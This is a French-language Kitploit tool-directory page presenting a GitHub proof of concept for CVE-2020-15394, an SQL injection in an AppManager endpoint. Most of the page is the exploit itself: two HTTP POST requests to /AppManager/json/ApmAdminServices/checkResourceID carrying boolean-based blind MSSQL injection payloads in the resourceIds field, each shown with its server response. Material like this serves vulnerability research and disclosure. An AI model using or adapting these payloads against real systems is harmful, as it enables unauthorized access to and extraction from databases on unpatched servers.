Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-15394-PoC — Preuve de concept CVE | Kitploit
Outils/GitHubGitHub/trungtin1998/cve-2020-15394-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubtrungtin1998/cve-2020-15394-poc

CVE-2020-15394-PoC

Preuve de concept CVE

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-15394

  • SGBD : MSSQL
  • Condition VRAIE dans une requête SQL
root@kitploit:~
POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=1)+THEN+1+ELSE+1/0+END)=1--
root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID_APM_80=123; Path=/; Secure; HttpOnly
Content-Type: text/plain;charset=UTF-8
Content-Length: 57
Date: Wed, 24 Nov 2021 09:39:56 GMT

1) AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 1/0 END)=1--
  • Condition FAUSSE dans une requête SQL
root@kitploit:~
POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=0)+THEN+1+ELSE+1/0+END)=1--
root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID_APM_80=123; Path=/; Secure; HttpOnly
Content-Type: text/plain;charset=UTF-8
Content-Length: 2
Date: Wed, 24 Nov 2021 09:44:04 GMT

Télécharger l’outil